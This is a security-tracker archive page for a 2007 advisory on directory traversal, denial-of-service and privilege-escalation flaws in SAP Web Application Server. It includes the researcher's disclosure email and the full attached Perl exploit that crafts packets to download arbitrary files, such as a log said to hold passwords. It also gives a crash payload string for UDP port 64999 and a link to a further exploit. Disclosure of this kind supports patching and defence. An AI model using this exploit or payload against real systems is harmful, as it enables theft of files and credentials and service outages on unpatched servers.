SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   SAP Web Application Server Vendors:   SAP
SAP Web Application Server Lets Remote Users Traverse the Directory and Deny Service
SecurityTracker Alert ID:  1017628
SecurityTracker URL:  http://securitytracker.com/id/1017628
CVE Reference:   CVE-2006-5784, CVE-2006-5785   (Links to External Site)
Date:  Feb 12 2007
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.40 < patch 136, 7.00 < patch 66
Description:   Several vulnerabilities were reported in SAP Web Application Server. A remote user can cause denial of service conditions. A remote user can view files on the target system. A local user can gain elevated privileges.

A remote user can supply a specially crafted request to view files on target system with the privileges of the target service [CVE-2006-5784]. On Windows-based systems, the service runs with the privileges of the 'SAPServiceJ2E' account, which is part of the local administrator group.

A local user can exploit this vulnerability to access a user-controlled process via a named pipe, impersonate the SAPServiceJ2E user account, and gain the privileges of that account. Windows 2000 prior to SP4, Windows XP prior to SP2, and Windows NT are affected by this privilege escalation vulnerability.

A remote user can send the string "\x72\xfe" to UDP port 64999 to cause the 'enserver.exe' process to crash [CVE-2006-5785].

A demonstration exploit is available at:

http://security.nnov.ru/files/tac0tac0.c

Nicob reported these vulnerabilities.

Impact:   A remote user can cause denial of service conditions.

A remote user can view files on the target system.

A local user can gain SAPServiceJ2E user privileges.

Solution:   The vendor has issued fixed versions (6.40 patch 136 or higher, 7.00 66 or higher).
Vendor URL:  www.sap.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technical details)


--=-3UKOL2Np1lsHLgwj2QYp
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

 
       Multiple vulnerabilities in SAP Web Application Server
                        Technical details


Application : SAP Web AS 6.40 < patch 136 and 7.00 < patch 66
Platform : All platforms (except the third vulnerability)
Impacts : Remote file disclosure, remote DoS, local privilege escalation
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>

Vulnerabilities technical details :
===================================

1) A remote file disclosure vulnerability allows reading any file to
which the user that the SAP Web Application Server is running as had
access. Under Windows, the service runs by default under the
SAPServiceJ2E account. This account is member of the local administrator
group.

Exploit : use "r3-stealer-1.0.pl" (attached)

Note : Absolute paths can be used, so "C:\boot.ini" and "\\10.11.12.13
\share\image.jpg" are both OK.

2) A remote denial of service allows crashing the enserver.exe process.

Exploit : send "\x72\xfe" on port UDP/64999

3) A local privilege escalation vulnerability allows any local user to
use the file disclosure vulnerability to access an user-controlled
process via a named pipe and impersonate as user SAPServiceJ2E. The
exploitation is possible only on Windows 2000 pre-SP4, Windows XP
pre-SP2 and Windows NT.

Exploit : use "r3-stealer-1.0.pl" (attached) and "tac0tac0.c" [1]

Solutions :
===========

Apply patch 136 or newer for version 6.40
Apply patch 66 or newer for version 7.00

Note : the mentioned patch level refers to the enqueue server
More details can be found in SAP notes 948457 and 959877

[1] : http://security.nnov.ru/files/tac0tac0.c

Nicob

--=-3UKOL2Np1lsHLgwj2QYp
Content-Disposition: attachment; filename=r3-stealer-1.0.pl
Content-Type: application/x-perl; name=r3-stealer-1.0.pl
Content-Transfer-Encoding: 7bit

#!/usr/bin/perl -w

##
## SAP 'enserver.exe' file downloader
## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
##
## File parameter :
##	C:\boot.ini
## 	\\10.11.12.13\share\image.jpg
##	..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
##

# Init

use strict;
use IO::Socket;

my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = "";

my $socket;
my $reply;

$|=1;

# Get arguments

if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 <ip> <port> <remote filename> (<local filename>)\n";}
my $host=$ARGV[0]; 
my $port=$ARGV[1]; 
my $filename=$ARGV[2]; 
my $output=$ARGV[3]; 

# Calculate variables

my $lg = length($filename);
my $tag1 = sprintf('%x', 0x4F + $lg);
my $tag2 = sprintf('%x', 0x20 + $lg);

# Show banner

print "#####################################################################\n";
print "### SAP 'enserver.exe' file downloader\n";
print "### Downloading '$filename' from '$host'\n";
print "#####################################################################\n\n";

# Define the packets

my $packet1 =
	"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003".	# Static
	"5f6e69636f625f6e69636f625f6e69636f62315f".								# ASCII string : "_nicob_nicob_nicob1_" 
	"00000000020000003b0000000500000002000000060000000400000001";						# Static

my $packet2 =
	"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
	"03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 .
	"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144";		# Crash if bad filename length

# Create the socket

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
		|| die "Connection refused at [$host:$port]";

# Send the two packet

print $socket pack("H*",$packet1);
print $socket pack("H*",$packet2);

sleep 2;

# Read and display response

recv($socket,$reply,150000,MSG_PEEK);
if ($reply =~ /^(.*)#EAD(.*)$/s) {
	print "File received !\n";
	if ((!defined($output)) or ($output eq "")) {
		print "\n===========================================\n";
		print $2;
		print "\n===========================================\n";
	} else {
		open(OUT, "> $output") || die "Can't open $output ($0)";
		print "File saved as '$output'\n";
		print OUT $2;
		close(OUT);
	}
} else {
	print "Problem interpreting reply :-(\n";
}

# Close the socket

print "\nThe end ...\n";
close $socket;



--=-3UKOL2Np1lsHLgwj2QYp--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC